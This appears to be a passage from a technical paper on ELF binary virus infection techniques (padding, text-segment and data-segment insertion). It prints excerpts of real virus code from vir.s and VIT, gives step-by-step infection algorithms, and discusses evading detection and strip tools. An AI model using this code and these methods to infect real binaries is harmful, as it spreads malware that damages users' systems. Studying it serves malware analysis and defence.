The first option uses the hosts own memory image for the virus. The advantage of this is that the virus doesnt have to modify the size of the image. That is, the size of the file grows but it doesnt use any addressing that isnt already being used. Hence the process image doesnt grow. The problem with this technique is that it destroys the original host by overwriting the process image. However, we can make a copy of the section of the image we overwrite and restore it when we transfer control to the host. This method can either use position independant code to overwrite the host image at any point. A variation is to use code that is at a fixed address. The virus is then inserted into the host at this specific location. At first glance, this sounds less than ideal considering programs are free to use the entire address space which may make a large gap between the virus image and the host image. Likewise, the images may conflict with each other making the virus use restoration techniques described earlier. However, a standard binary always starts at the same virtual address, so by taking this into account, the fixed address technique is probably going to work needlessly. That is, taking advantage of this we can have an educated guess of how our virus should be link edited. A real advantage of the this technique described is that they are much simpler to implement than the remaining techniques described.

The second method uses position independant code and inserts virus code "around" the host code. For example if the host uses the address space of 0x08048000 to 0x08049000 in the process image, the the virus can use anything before 0x08048000 or anything after 0x08049000. The virus must be position independant because the virus doesnt know what address space is available to use until it infects the host. The major advantage of this technique, is that the virus can stay memory resident in the process. In the previous method remember, the virus image was replaced with the original host image when transferring control back to the host. Thus the virus could not interact with the host once control was returned back to the host.

The Staog virus (QuantumG 1996) and the vir.s parasite (Stealth 1999) both overwrite the host image with the virus. They then restore the image they modify with the virus, when transferring control back to the host. The host image that is overwritten is appended to the binary for easy retrieval. The problem that these virus suffer is similar to the failure in the Bliss virus when stripped. The appended data is not strip safe.

Also, the text segment must be changed or marked writeable. This is so the host image can be restored. In Staog, the Linux mprotect system call was used to modify the text segment so it is writeable. In vir.s the ELF headers, namely the program header describing the text segment, were modified so the text segment was loaded being writeable.

Another real problem, is that the stack is typically used to execute code using this technique. Because the text segment which is being executed must be overwritten with the host, the same segment of code cannot be used for the restoration. For example look at the following pseduo code which doesnt work.

	virus:
		/* virus main */
		for (q = saved_host; p = virus; p < end_of_virus; p++, q++)
			*p = *q;
	end_of_virus:

In this example, the code that is running, overwrites itself. This is a problem that the technique being discussed faces. The solution to this, is to move the code onto the stack or any other position which doesnt modify the rest of the program. If we move the code onto the stack, we can safely copy the host image over the virus image.

Lets look at how vir.s uses this approach.

VIR.S

.
.
.

# seek to e_phoff

        movl $LSEEK, %eax
        movl -1972(%ebp), %ecx
        movl $SEEK_SET, %edx
        int $0x80

        movw -1956(%ebp), %ecx          # get e_phnum (2 bytes)
l1:     pushl %ecx
        movl $READ, %eax                # read in program header
        leal -2000(%ebp), %ecx
        movl $PHDR32_LEN, %edx
        int $0x80

        movl $LSEEK, %eax               # seek back these bytes
        xorl %ecx, %ecx
        subl $PHDR32_LEN, %ecx
        movl $SEEK_CUR, %edx
        int $0x80

        movb $7, -1976(%ebp)            # set falgs to PT_READ|PT_EXEC|PT_WRITE
(
                                        # Huh? Elf32 requires a word (4 bytes) here
                                        # but for what ? 7 is the greatest value...

        movl $WRITE, %eax               # write back programheader
        leal -2000(%ebp), %ecx
        movl $PHDR32_LEN, %edx
        int $0x80

        popl %ecx
        loop l1

# seek to (TEXTADDR - e_entry) in file

        movl $LSEEK, %eax
        popl %ecx                       # get back e_entry
        subl $TEXTADDR, %ecx
        pushl %ecx                      # save virii-pos, we need it later
        movl $SEEK_SET, %edx
	int $0x80

# read and save bytes that we will overwrite
# onto stack

        movl $READ, %eax
        leal -2000(%ebp), %ecx
        movl $(END-main), %edx
        int $0x80

# and write back to end of file (first seek there)

        movl $LSEEK, %eax
        xorl %ecx, %ecx
        movl $SEEK_END, %edx
        int $0x80

        movl $WRITE, %eax
        leal -2000(%ebp), %ecx
        movl $(END-main), %edx
        int $0x80

# seek back to virii-position

        movl $LSEEK, %eax
        popl %ecx               # get back saved position
        movl $SEEK_SET, %edx
        int $0x80

# write viruscode to file

        movl $WRITE, %eax
        movl %edi, %ecx
        movl $(END-main), %edx
        int $0x80

# close file

close_file:
        movl $CLOSE, %eax
        int $0x80

# move end of virus to stack
# and jump there

leave_virus:
        call lvl1
lvl1:   popl %ebx
        subl $5, %ebx

        pushl %edi
        pushl %esi

        movl $(END-before_end), %ecx    # number of bytes
        movl %ebx, %esi                 # from where ?
        addl $(before_end-leave_virus), %esi

        leal -1000(%ebp), %edi          # to where ?
        cld
        rep
        movsb

        popl %esi
        popl %edi

# OK, moved -- jump there
        leal -1000(%ebp), %eax
        pushl %eax
        ret

# construct "/proc//exe"

before_end:

.
.
.

# move original bytes from victum to memory
# so seek to end this position,

        movl $LSEEK, %eax
        xorl %ecx, %ecx
        subl $(END-main), %ecx
        movl $SEEK_END, %edx
        int $0x80

# read in # bytes

        movl $READ, %eax
        leal -2000(%ebp), %ecx
        movl $(END-main), %edx
        int $0x80

#
        movl $CLOSE, %eax
        int $0x80

# move original bytes to memory


        leal -2000(%ebp), %esi
        movl $(END-main), %ecx
        rep
        movsb

# restore registers/flags

        movl %ebp, %esp
        popl %ebp
        popa
        popf
        ret

The technique just described as mentioned earlier is not the most desireable technique, for the problems already mentioned. The major problem to reiterate are that the virus cannot easily be made memory resident, since to remain resident, the virus needs to interact with the host, while the host is running (that is, after control has been relinquished from the virus).

The method of infection that is most highly effective and evident in the VIT and Siilov viruses is using position independant code and inserting the virus around the host image. Again, this has the advantage of being compliant with memory resident viruses, which is not possible using the other techniques that either arent binary infectors, or trys use the same address space of the host. To do this leaves us with three options, inserting code before the text segment, inserting code after the data segment, or inserting code in between the text and data segments using the padding. This might sound unusual if we consider the data segment is normally never executeabler. However, certain operating systems and architectures (such as Linux x86) having read and write access to the data segment also permits executeable permission. The Siilov and mandragore viruses are examples of such viruses that use the data segment for executeable code.

The use of dynamic functions is to be avoided when writing viruses. The reason for this is related to the structure of ELF binaries. In an ELF executeable, all dynamically linked procedures must be known to the binary before linking. This is because the ELF format creates such things as symbol and hash tables, dynamic information on information on what libraries are required and so forth. It is quite possible to use the dynamic symbols already in use without major reconstruction of the executeable. However, this means we must limit our function calls to only those symbols already being used. Adding new dynamic symbols complicates things emensly and major reconstruction of the binary would be required. The effort to do such things, is far greater than the rewards it returns. At the time of writing, no viruses using the techniques of infection described in this paragraph, have been writen.

In regards to the actual infection technique, Position Independant Code (PIC) can be compiled with the use of the -fPIC flag in the GNU compiler. Experience of using this with Linux though, makes it fail when using system calls directly (as opposed to dynamic libraries). Therefore, to write position independant code requires the programmer to recognize sections of code which use absolute addressing and replace them with PIC manually through the use of such things as determining the address the program was loaded at and so forth.

An example of using position independant code with system calls in i386 Linux is presented.

I386 Linux Position Independant Code (PIC)

	char *hello(void)
	{
		asm("
			call reloc
		reloc:
			popl %eax
			addl $(data - reloc), %eax

			jmp leave

		data:
		.ascii \"Hello\\n\"

		leave:
		");
	}

	int main()
	{
		write(FILENO_STDOUT, hello(), sizeof("Hello\n"));
		return 0;
	}

In x86 to find the address of the data in the image we take note that when a 'call' instruction is made, the instruction pointer (eip in x86) is pushed onto the stack so when the 'ret' instruction is reached to return from the function, the eip is popped off the stack. Instead of returning, we can pop the value of the stack manually and thus have a means of finding the address of the instruction following the call. This is a popular technique and useful for virus authors. Both the Staog and mandragore viruses use this technique to determine the address of the virus at runtime.

It must be noted, that some object formats such as that being used for execution of programs, which use position independant code modify the format of other sections besides object code. An example of this is the PLT/GOT, which can either use hardcoded branch instructions, or possibly become position independant through the use of an extra register set aside for the location of key structures.

An alternative to writing position independant code is to use a relocatable object such as produced by the compiler, namely object code. In this case, we have the necessary relocation information to successfuly link the virus into the process at the required load address. This is useful for one off infections such as implanting a trojan horse or trapdoor into a binary. For a virus, the relocation information must be carried around with the virus so it can link itself again at the next infection. The use of position independant code has been the most widely used method in viruses at the time of writing. It is also likely to remain like this, as not using position independant code makes viruses more prone to infection complications.

A Different Look At Infection

A technique which utilizes techniques from both methods will now be described. Firstly, consider what must be done to make the file size of an infected binary the same size as the non infected image while at the same time transferring control back to the original host without destroying any of the original image. At first glance, this may appear impossible since the virus or parasite will always maintain a non zero image size. Therefore, how do we add to one without destroying the other as is the case with overwriting infection.

Section Alignment Padding Infection

The first thing we can note, is that the ELF binary format typically aligns sections within the file image. Thus, it is possible to extend the sections present to use up all the padding used for allignment. For example, lets look at two common sections with an alignment of 32 bytes. These sections are the .rodata and .bss sections. The .bss section cannot be used because remember the BSS does not actually maintain an image in the binary (because the BSS is a section containing only zeros, it can be built at load time). However, the .rodata section does maintain a file image. If we look at the file offset and the size of the .fini section which appears directly before the .rodata section we note that the file offset for the .rodata section on typical binaries is greater than the end of the .fini section. This space is alignment padding and presents a viable place in the file for a parasite to live.

Note that the alignment padding is typically small, and on average only 16 bytes. This isnt alot, but may possibly be used for some small function such as a time bomb.

Function Alignment Padding Infection

Another form of infection similar to that just described is using the padding at the end of functions. In many architectures, functions are aligned to boundaries. This is especially true when the said program is compiled with an optimizing compiler such as gcc with the -OX option, where X is 2 or higher option.

Using compression, it is possible to compress the original file image and then use a loader to decompress the original image. Following this, the extra file space saved can be used for the parasite or virus to be inserted. Typically, if the resulting infection is smaller than the original host, then the extra space is filled into the binary so that the file sizes remain the same. The trick with this technique is to make sure that the text and data segments remain at least as big as the original host's segments. This is due to the fact that that after decompressing the original host, the host must then be housed at its original load address. Remember, the host is typically not relocatable or position independant.

Padding Infection

The first infection technique we will examine that uses the surrounding address space of the host is padding infection. In this method, we insert the virus into the padding at the end of the text segment, or the padding between the text segment and the data segment. It would seem at first glance, that these two areas, the text segment padding, and the padding between the text and data segment are the same. In the a.out format the data segment starts at the beginning of a new page. In the ELF format, the data segment does not always start at the beginning of a page. Nor does the text segment end on a page border.

Lets look at this in a real ELF binary.

    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
         filesz 0x0000b7cf memsz 0x0000b7cf flags r-x
    LOAD off    0x0000b7d0 vaddr 0x080547d0 paddr 0x080547d0 align 2**12
         filesz 0x00000250 memsz 0x000004dc flags rw-

In this example, the text segment ends at 0x080537cf. The data segment begins at 0x080547d0. This is somewhat misleading, because the actual segment begins at the start of a page in a process image; remember that memory is allocated in pages. The data segment in terms of what is being used by the program does not though. The reason for this is because of a strict requirment of the ELF specifications regarding the virtual address of a segment and the file offset of that same segment. This will be discussed fully later.

Infecting the padding of the text segment has the unfortunate (to the virus writer) problem that virus code must fit into the padding, thus naively on average limiting the virus to half the page size (a page being 4096 bytes on x86). More likely, is that almost an entire page is present since the ELF specifications require strict addresses and file offsets. This technique is quite effective as demonstrated by the VIT virus, (Cesare 1998).

In the a.out format, this means we simply overwrite the binary image in the file padding with the virus and update the a.out headers.

find the offset for the padding between text and data segments
overwrite the padding in the file with the virus
increase a_text in the exec header by the size of the virus.

In the ZMAGIC a.out format the padding for the text segment is at the file offset a_text.

In ELF, things are almost the same except we must remember then we are inserting (as opposed to overwriting in a.out), if the size of the virus is not congruent to modulo the page size ELF (4K on x86) then padding must be used to make a complete page. In simpler terms, this means, that the size must be in increments of 4K (page size) otherwise padding must be used to fill it to a page boundary.

	Lower Memory Address		

		Modified Image		Unmodified Image
	
		[TTTTTTTTTTTTTTT]	[TTTTTTTTTTTTTTT]
		[TTTTTTTTVVVVVVV]	[TTTTTTTTPPPPPPP]
		[VVVVVVVVVVPPPPP]	[PPPPPPPPPPPPPPP]

		[PPPPPDDDDDDDDDD]	[PPPPDDDDDDDDDDD]
		[DDDDDDDDDDDDDDD]	[DDDDDDDDDDDDDDD]
		[DDDDDDDDBBBBBBB]	[DDDDDDDBBBBBBBB]

		[BBBBBBBBPPPPPPP]	[BBBBBBBPPPPPPPP]
		[PPPPPPPPPPPPPPP]	[PPPPPPPPPPPPPPP]
		[PPPPPPPPPPPPPPP]	[PPPPPPPPPPPPPPP]


	Higher Memory Address

--
	Key:
		T	TEXT	(ro)
		D	DATA	(rw)
		B	BSS	(rw)
		V	VIRUS	(ro)
		P	PADDING

		Three lines [] represents one page of memory

	* The stack has been removed from the diagram for simplicity

It can be seen that the text segment size is not congruent modulo to the page size, so we have room to play with and can insert the virus into the image.

To attach the virus to the host we naturally must physically insert the virus image into the host image. To do this, we simply insert it at the end of the text segment. This shifts the rest of the file - remember, we are inserting, not overwriting. This changes the layout of the binary, so we must modify the ELF header and the auxilaiary information that gives information on the binaries layout.

The first thing we must change is the loadable segment size. To actually tell the binary that new code is to be loaded, we modify the program header account for the new code. This is easily done by icnreasing the p_filesz and p_memsz fields.

Because we are inserting new data into the file image, any program headers and section headers that appear after the virus in the image must have there appropriate headers modified to reflect the new position. This is reflected by the p_offset and sh_offset for program and section headers respectively.

To insert code at the end of the text segment thus leaves us with the following to do so far.

Locate the text segment program header
- Increase p_filesz to account for the new code
- Increase p_memsz to account for the new code
For each phdr who's segment is after the insertion (text segment)
- increase p_offset to reflect the new position after insertion
For each shdr who's section resides after the insertion
- Increase sh_offset to account for the new code
Physically insert the new code into the file: text segment p_offset + p_filesz (original)

The reason why we increase p_shoff is that the section header table will appear after the virus. The section header table remember, appears after the segments in an executeable.

The virtual starting address of the segment must be congruent to the file offset modulo the page size. The simplest way of doing this is to always insert page size incrememnts into the file, even if we only use a portion of the page for our virus.

key:	~= is denoting congruency.

	p_vaddr (mod PAGE_SIZE) ~= p_offset (mod PAGE_SIZE)

To take into account of the congruency of p_vaddr and p_offset, our algorithm is modified to appear as this.

Increase p_shoff by PAGE_SIZE in the ELF header
Locate the text segment program header
- Increase p_filesz by account for the new code
- Increase p_memsz to account for the new code
For each phdr who's segment is after the insertion (text segment)
- increase p_offset by PAGE_SIZE
- Increase sh_offset by PAGE_SIZE
Physically insert the new code and pad to PAGE_SIZE, into the file - text segment p_offset + p_filesz (original)

Now that the process image loads the new code into being, to run the new code before the host code is a simple matter of patching the ELF entry point and the virus jump to host code point.

The new entry point is determined by the text segment v_addr + p_filesz (original) since all that is being done, is the new code is directly prepending the original host segment. For complete infection code then.

        * Increase p_shoff by PAGE_SIZE in the ELF header
        * Patch the insertion code (parasite) to jump to the entry point
          (original)
        * Locate the text segment program header
                * Modify the entry point of the ELF header to point to the new
                  code (p_vaddr + p_filesz)
                * Increase p_filesz by account for the new code (parasite)
                * Increase p_memsz to account for the new code (parasite)
        * For each phdr who's segment is after the insertion (text segment)
                * increase p_offset by PAGE_SIZE
        * For each shdr who's section resides after the insertion
                * Increase sh_offset by PAGE_SIZE
        * Physically insert the new code (parasite) and pad to PAGE_SIZE, into
          the file - text segment p_offset + p_filesz (original)

This, while perfectly functional, can arouse suspicion because the the new code at the end of the text segment isn't accounted for by any sections. Its an easy matter to associate the entry point with a section however by extending its size, but the last section in the text segment is going to look suspicious. Associating the new code to a section must be done however as programs such as 'strip' use the section header tables and not the program headers. The final algorithm is using this information is.

        * Increase p_shoff by PAGE_SIZE in the ELF header
        * Patch the insertion code (parasite) to jump to the entry point
          (original)
        * Locate the text segment program header
                * Modify the entry point of the ELF header to point to the new
                  code (p_vaddr + p_filesz)
                * Increase p_filesz by account for the new code (parasite)
                * Increase p_memsz to account for the new code (parasite)
        * For each phdr who's segment is after the insertion (text segment)
                * increase p_offset by PAGE_SIZE
        * For the last shdr in the text segment
                * increase sh_len by the parasite length
        * For each shdr who's section resides after the insertion
                * Increase sh_offset by PAGE_SIZE
        * Physically insert the new code (parasite) and pad to PAGE_SIZE, into
          the file - text segment p_offset + p_filesz (original)

Note that for all the algorithms presented, we change the program header memory sizes by the virus size, not the page size. It is probably better to increase by the page size since then every byte is accounted for in the binary, but supringly, such programs as strip do not delete the unaccounted data for, probably because this would violate the ELF specifications by making p_vaddr and p_offset not congruent to each other modulo the page size.

A real problem with this is that the entry point of the program gets modified to typically point into the .rodata section which is a special section for read only data which is highly unusual and easily detected. Another problem is that the virus has no real data segment. All data is uses must be allocated for on the heap. Alternatively, implementation dependant system calls can be used to mark part of the text segment as writeable. This enables the use of a data segment. This technique of creating a data segment for this type of infection is generally undesireable however as much of the virus size would be occupied by the psuedo data segment providing part of the virus image at compile time was occupied by this segment. In padding infection, size is very important since only the padding of segments is used and often occupies less than or equal to a page size.

Looking at part of the infection routine used in the VIT virus (Cesare 1998) we can see this in real life.

/*
        update the phdr's to reflect the extention of the text segment (to
        allow virus insertion)
*/

        offset = 0;

        for (phdr = (Elf32_Phdr *)pdata, i = 0; i < ehdr.e_phnum; i++) {
                if (offset) {
                        phdr->p_offset += PAGE_SIZE;
                } else if (phdr->p_type == PT_LOAD && phdr->p_offset == 0) {
/*
        is this the text segment ? Nothing says the offset must be 0 but it
        normally is.
*/
                        int palen;

                        if (phdr->p_filesz != phdr->p_memsz) goto error;

                        evaddr = phdr->p_vaddr + phdr->p_filesz;
                        palen = PAGE_SIZE - (evaddr & (PAGE_SIZE - 1));

                        if (palen < vlen) goto error;

                        ehdr.e_entry = evaddr + ventry;
                        offset = phdr->p_offset + phdr->p_filesz;

                        phdr->p_filesz += vlen;
                        phdr->p_memsz += vlen;
                }

                ++phdr;
        }

        if (offset == 0) goto error;

	.
	.
	.

/* update the shdr's to reflect the insertion of the parasite */

        for (shdr = (Elf32_Shdr *)sdata, i = 0; i < ehdr.e_shnum; i++) {
                if (shdr->sh_offset >= offset) {
                        shdr->sh_offset += PAGE_SIZE;
/* is this the last text section? */
                } else if (shdr->sh_addr + shdr->sh_size == evaddr) {
/* if its not strip safe then we cant use it */
                        if (shdr->sh_type != SHT_PROGBITS) goto error;

                        shdr->sh_size += vlen;
                }

                ++shdr;
        }

/* update ehdr to reflect new offsets */

        oshoff = ehdr.e_shoff;
        if (ehdr.e_shoff >= offset) ehdr.e_shoff += PAGE_SIZE;

Text Infection

Inserting the virus before the text segment is another option and has the desireable effect of leaving the entry point in the text segment. Also, as with padding infection, it resides in an executeable segment so if the kernel does not allow execution of the data segment, then this and padding infection are the only real option (unless however, if the kernel provides mechanisms for changing the protection of memory regions; in which case the initial part of the text segment can mark the data segment as executeable).

In a.out however we cant use text infection, because the text segment isnt identified with an explicit virtual address that can be changed as it does with ELF we cant add new code before the text segment since doing so would shift the original text segment in memory making absolute references fail.

	Lower Memory Address		

		Modified Image		Unmodified Image

					[VVVVVVVVVVVVVVV]
					[VVVVVVVVVVVVVVV]
					[VVVVVPPPPPPPPPP]

		[TTTTTTTTTTTTTTT]	[TTTTTTTTTTTTTTT]
		[TTTTTTTTPPPPPPP]	[TTTTTTTTPPPPPPP]
		[PPPPPPPPPPPPPPP]	[PPPPPPPPPPPPPPP]

		[DDDDDDDDDDDDDDD]	[DDDDDDDDDDDDDDD]
		[DDDDDDDDDDDDDDD]	[DDDDDDDDDDDDDDD]
		[DDDDDDDDBBBBBBB]	[DDDDDDDBBBBBBBB]

		[BBBBBBBBPPPPPPP]	[BBBBBBBPPPPPPPP]
		[PPPPPPPPPPPPPPP]	[PPPPPPPPPPPPPPP]
		[PPPPPPPPPPPPPPP]	[PPPPPPPPPPPPPPP]


	Higher Memory Address

--
	Key:
		T	TEXT	(ro)
		D	DATA	(rw)
		B	BSS	(rw)
		V	VIRUS	(ro)
		P	PADDING

		Three lines [] represents one page of memory

	* The stack has been removed from the diagram for simplicity

Text infection simply inserts the parasite or virus object code before the actual executeable image. Note that the ELF header must be copied to the beginning of the new binary. This is because the ELF header must always appear first in a binary. The program headers do not strictly have to follow the ELF header, however it is generally the correct behaviour to follow. In the following algorithm, the section header table is ignored. However, the original sections modify the table to reflect their new positions in the resulting binary.

NAIVE ELF TEXT INFECTION ALGORITHM

        * Patch the insertion code (parasite) to jump to the entry point
          (original) at parasite completion.
        * Locate the text segment
                * Patch the segment to account for the prepended text (ie
                  change p_vaddr and p_paddr)
	* For each phdr before the insertion
		* decrease p_offset to reflect the new position after insertion
        * For each phdr who's segment is after the insertion (text segment)
                * increase p_offset to reflect the new position after insertion
        * For each shdr who's section resides after the insertion
                * Increase sh_offset to account for the new code
        * Move the ehdr and phdr's to the start of the new binary
        * Physically insert the new code into the file

The algorithm as is has the similar problem to one of the earlier padding infection algorithms in that no section header accounts for the new code. This means again, we need to create a new section or extend an existing section. Creating a new section makes the file headers look suspicious since they are quite constant under Unix because everything is typically created by the compiler and linker.

Looking at the section header table of a typical binary gives the following:

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .interp       00000013  080480d4  080480d4  000000d4  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  1 .hash         000000c4  080480e8  080480e8  000000e8  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  2 .dynsym       000001e0  080481ac  080481ac  000001ac  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .dynstr       000000fd  0804838c  0804838c  0000038c  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  4 .rel.got      00000008  0804848c  0804848c  0000048c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .rel.bss      00000008  08048494  08048494  00000494  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  6 .rel.plt      00000080  0804849c  0804849c  0000049c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  7 .init         0000002c  08048520  08048520  00000520  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  8 .plt          00000110  0804854c  0804854c  0000054c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  9 .text         00000688  08048660  08048660  00000660  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 10 .fini         0000001c  08048cf0  08048cf0  00000cf0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .rodata       00000091  08048d0c  08048d0c  00000d0c  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 12 .data         00000004  08049da0  08049da0  00000da0  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 13 .ctors        00000008  08049da4  08049da4  00000da4  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 14 .dtors        00000008  08049dac  08049dac  00000dac  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 15 .got          00000050  08049db4  08049db4  00000db4  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dynamic      00000088  08049e04  08049e04  00000e04  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .bss          00000008  08049e8c  08049e8c  00000e8c  2**2
                  ALLOC
 18 .comment      00000064  00000000  00000000  00000e8c  2**0
                  CONTENTS, READONLY
 19 .note         00000064  00000064  00000064  00000ef0  2**0
                  CONTENTS, READONLY

The entry point for this executeable lies in the init section as do all programs that use the standard C library. A possible solution to the section problem is to simply move all sections before the init section into the start of the new file. Then make the init section cover everything up until the end of the original init. This however, moves sections located by absoulte addresses in the text segment. However, these are special sections used by the dynamic linker at runtime. The dynamic information pointed at by both sections and program headers must be modified to reflect the new position of these sections. Likewise, the .init section can also be moved since it too is referenced by the dynamic information. This section in general does not use absolute references and does not reference any static data.

ELF TEXT INFECTION ALGORITHM

        * Patch the insertion code (parasite) to jump to the entry point
          (remember .init has moved) at parasite completion.
        * Locate the text segment
                * Patch the segment to account for the prepended text (ie
                  change p_vaddr and p_paddr)
        * For each phdr before the insertion
                * decrease p_offset to reflect the new position after insertion
        * For each phdr who's segment is after the insertion (text segment)
                * increase p_offset to reflect the new position after insertion
        * Patch the .text section to account for the new code
        * Locate the .dynamic section or segment
                * Locate and patch each entry used by the sections that have
                  been relocated in the text segment
        * Physically insert the new code into the file

Again as with the padding infection technique, we must use insertion sizes that are congruent to modulo the page size (sizes in steps of page sizes).

Data Infection

To extend the data segment means we simply have to extend the program header in the ELF executable. Note must be taken though, that the bss section ends the data segment normally. This section is used for uninitialized data and occupies no file space but does occupy memory space.

[ more ]

The mandragore virus does something rather unusual with data infection. It simply appends the virus image to the binary, and then extends the data segment in the program headers to the new end of file. Remember that the last section in a binary is often not the end of the data segment. The last sections typically are such things as .note, .comment and .shstrtab sections. Likewsie the section header table normally appears after the end of the data segment. However, with the mandragore virus, the data segment is used to house the virus making it a variation of data infection. This virus also manually zero's out the BSS segment since the BSS segment is always at the end of the data segment. That is, you cant set aside data to be zeroed out as the BSS unless its the last section of the data segment. This technique is useful, however the binary looks highly suspicious since sections are overlapping. Also, the mandragore virus was not strip safe.

Looking at a binary infected with the mandragore virus we can see the following:

$ objdump --all-headers a.out

a.out:     file format elf32-i386
a.out
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x0804ca30

Program Header:
    PHDR off    0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2
         filesz 0x000000c0 memsz 0x000000c0 flags r-x
  INTERP off    0x000000f4 vaddr 0x080480f4 paddr 0x080480f4 align 2**0
         filesz 0x00000013 memsz 0x00000013 flags r--
    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
         filesz 0x0000313e memsz 0x0000313e flags r-x
    LOAD off    0x00003140 vaddr 0x0804c140 paddr 0x0804c140 align 2**12
         filesz 0x00000b8a memsz 0x000104bc flags rw-
 DYNAMIC off    0x000032dc vaddr 0x0804c2dc paddr 0x0804c2dc align 2**2
         filesz 0x000000a0 memsz 0x000000a0 flags rw-
    NOTE off    0x00000108 vaddr 0x08048108 paddr 0x08048108 align 2**2
         filesz 0x00000020 memsz 0x00000020 flags r--

.
.
.

Sections:
Idx Name          Size      VMA       LMA       File off  Algn

.
.
.

                  CONTENTS, ALLOC, LOAD, DATA
 21 .bss          0001027c  0804c380  0804c380  00003380  2**5
                  ALLOC
 22 .comment      0000014a  00000000  00000000  00003380  2**0
                  CONTENTS, READONLY
 23 .note         00000078  0000014a  0000014a  000034ca  2**0
                  CONTENTS, READONLY

If you examine the program and section headers, discrepencies are easy to notice. Specifically the data segment does not end at the BSS section. It extends past the .comment and .note sections. Likewise, the size of the BSS section in the section header table is too large. The BSS section and the data segment dont match. Another tell tale sign is the entry point of the executeable is not in the text segment.

The mandragore does not fully use the potential of this technique as it doesnt apply much modification to the section headers. Ideally, the .dynamic section of the binary which preceeds the BSS section could be extended to account for the extra data. The BSS, note and comment sections would then also be modified or even removed completly. This would make the section header table much more believable, and should remain strip safe, since the table would again be in a consistant state.

An alternative approach to extending the data segment is to insert the virus at the end of the data segment as located physically in the file. This means that the final sections dont become part of the process image as with the previous virus discussed. The problem with this approach is that the BSS is the last section in the data segments image, and the BSS doesnt actually remain present in the files image. Thus, if we simply insert the virus into the image, the virus image and BSS will be at conflict. Typically, this would mean the virus gets zeroed out where the BSS section should be. An solution to this approach requires recognition that the BSS is simply another part of the process image that doesnt physically reside in the file. However, to solve this problem, its possible to use our own psuedo BSS section. If we extend the data segment we have to leave space for the bss section physically in the file image. The memory layout is as follows using this technique.

--
	Lower Memory Address		

		Modified Image		Unmodified Image
	
		[TTTTTTTTTTTTTTT]	[TTTTTTTTTTTTTTT]
		[TTTTTTTTPPPPPPP]	[TTTTTTTTPPPPPPP]
		[PPPPPPPPPPPPPPP]	[PPPPPPPPPPPPPPP]

		[DDDDDDDDDDDDDDD]	[DDDDDDDDDDDDDDD]
		[DDDDDDDDDDDDDDD]	[DDDDDDDDDDDDDDD]
		[DDDDDDDDEEEEEEE]	[DDDDDDDBBBBBBBB]

		[EEEEEEEEVVVVVVV]	[BBBBBBBPPPPPPPP]
		[VVVVVVVVVVVVVVV]	[PPPPPPPPPPPPPPP]
		[VVVVPPPPPPPPPPP]	[PPPPPPPPPPPPPPP]


	Higher Memory Address

--
	Key:
		T	TEXT		(ro)
		D	DATA		(rw)
		E	VIRUS BSS	(rw)		
		V	VIRUS		(rw)
		P	PADDING

		Three lines [] represents one page of memory

	* The stack has been removed from the diagram for simplicity

Note that the virus must fill in the bss section manually using file space.

The algorithm for the data segment parasite is show below.

        * Patch the insertion code (parasite) to jump to the entry point
          (original)
        * Locate the data segment
                * Modify the entry point of the ELF header to point to the new
                  code (p_vaddr + p_memsz)
                * Increase p_filesz to account for the new code and .bss
                * Increase p_memsz to account for the new code
                * Find the length of the .bss section (p_memsz - p_filesz)
        * For each phdr who's segment is after the insertion (text segment)
                * increase p_offset to reflect the new position after insertion
        * For each shdr who's section resides after the insertion
                * Increase sh_offset to account for the new code
        * Physically insert the new code into the file

The algorithm shown works for an ELF executable but the parasite inserted into the host becomes strip unsafe because no section matches the parasite. A new section could be created for this purpose to become strip safe again. "The SIILOV Virus" (Cesare, 1999) uses this approach. Alternatively, if we look at the section headers of a typical ELF executeable, we see that the last section before the new parasite code is the .dynamic section. We can then in theory extend this section to make the resulting binary strip safe again.

If we increase the dynamic section we should also increase the phdr so it doesnt look unusual. Also, we must change the bss section so it reflects that no bss is automatically created. This results in the following algorithm which doesn't actually work as expected.

	FAULTY ALGORITHM

        * Patch the insertion code (parasite) to jump to the entry point
          (original)
        * Locate the data segment
                * Modify the entry point of the ELF header to point to the new
                  code (p_vaddr + p_memsz)
                * Increase p_filesz to account for the new code and .bss
                * Increase p_memsz to account for the new code
                * Find the length of the .bss section (p_memsz - p_filesz)
        * For each phdr who's segment is after the insertion (text segment)
                * increase p_offset to reflect the new position after insertion
        * For each shdr who's section resides after the insertion
                * Increase sh_offset to account for the new code
	* Find the .dynamic shdr
		* increase the sh_size by the size of the virus
	* Find the dynamic phdr
		* increase the p_filesz and p_memsz by the size of the virus
	* Find the bss shdr
		* Modify sh_size to 0
        * Physically insert the new code into the file

This however is faulty. Extending the phdr causes severe problems as the dynamic segment is used on program loading and thus interferes with this process. Likewise, if only the section is extended to accout for the virus, then problems also occur during stripping. In this case, the descrepency between the program header and section header causes strip to corrupt the resulting phdr.

If instead we take the approach of the Siilov virus (Cesare 1999) then we need to add a new section. If were making such large modifications to the binary, then it helps to load each section into memory along with the header information and modify it in memory, writing it back to disk when were finished.

If we look at a sample ELF program produced by the standard compilers and linkers then we see the sections go in this order:

        .
	.
	.
	bss
	section header table
	comment
	note
	shstrtab
	symtab

The virus appears after the bss section so the new section table will look like this:

        .
        .
        .
        bss
	data1			# virus
        section header table
        comment
        note
        shstrtab
        symtab

